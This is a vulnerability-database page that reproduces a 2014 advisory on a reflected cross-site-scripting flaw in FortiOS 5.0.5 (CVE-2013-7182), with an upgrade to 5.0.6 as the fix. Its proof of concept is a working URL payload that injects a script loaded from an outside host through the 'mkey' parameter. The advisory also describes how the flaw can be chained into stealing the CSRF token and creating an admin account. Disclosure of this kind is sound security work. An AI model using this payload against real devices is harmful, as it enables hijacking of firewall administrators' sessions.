Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

FortiOS 5.0.5 Cross Site Scripting

🗓️ 04 Feb 2014 00:00:00Reported by William CostaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 53 Views

FortiOS 5.0.5 XSS vulnerability allows injection of arbitrary HTML/Script code through "mkey" parameter in /firewall/schedule/recurrdlg page, impacting user's browser security. Upgrade to FortiOS 5.0.6 or higher

Related
Code
ReporterTitlePublishedViews
Family
CVE		CVE-2013-7182
4 Feb 201402:00
cve
Cvelist		CVE-2013-7182
4 Feb 201402:00
cvelist
EUVD		EUVD-2013-6965
7 Oct 202500:30
euvd
Fortinet		FortiGate Cross-Site Scripting Vulnerability
3 Feb 201400:00
fortinet
Tenable Nessus		Fortinet FortiOS 5.x < 5.0.6 XSS
15 Apr 201400:00
nessus
NVD		CVE-2013-7182
4 Feb 201405:39
nvd
OpenVAS		Fortinet FortiGate XSS Vulnerability (FG-IR-14-003)
11 Feb 201500:00
openvas
Prion		Cross site scripting
4 Feb 201405:39
prion
CERT		Fortinet FortiOS 5.0.5 contains a reflected cross-site scripting (XSS) vulnerability
3 Feb 201400:00
cert
`I. VULNERABILITY  
  
-------------------------  
  
Reflected XSS Attacks vulnerabilities in FortiOS 5.0.5  
  
  
  
II. BACKGROUND  
  
-------------------------  
  
Fortinet's industry-leading, Network Security Platforms deliver Next  
Generation Firewall (NGFW) security with exceptional throughput, ultra  
low latency, and multi-vector threat protection.  
  
  
  
III. DESCRIPTION  
  
-------------------------  
  
Has been detected a Reflected XSS vulnerability in FortiOS in 5.0.5.  
  
The code injection is done through the parameter "mkey" in the page  
/firewall/schedule/recurrdlg"  
  
  
  
IV. PROOF OF CONCEPT  
  
-------------------------  
  
The application does not validate the parameter "mkey" correctly.  
  
  
  
http://IP_FORTIGATE/firewall/schedule/recurrdlg?mkey=a"><SCRIPT  
SRC="http://10.0.1.120/xss/good.js"></SCRIPT>  
  
V. BUSINESS IMPACT  
-------------------------  
An attacker can execute arbitrary HTML or script code in a  
targeteduser's browser, , that allows the execution of arbitrary  
HTML/script code to be executed in the context of the victim user's  
browser allowing theft CSRF token, thus enabling the creation of a  
Administrator User in box for full access  
  
  
  
  
  
VI. SYSTEMS AFFECTED  
-------------------------  
Try FortiOS v5.0.5 VM and Applaince  
  
  
  
VII. SOLUTION  
------------------------  
  
Upgrade to FortiOS 5.0.6 or higher.  
  
References  
  
http://www.fortiguard.com/advisory/FG-IR-14-003/http://www.kb.cert.org/vuls/id/728638  
  
  
  
By William Costa  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2014 00:00Current
EPSS0.00812
fortioscross site scriptinghtml code injectionsecurity vulnerabilityfortinetnext generation firewallarbitrary code executioncsrf tokenfortios 5.0.6upgradefortiguardcert advisory
53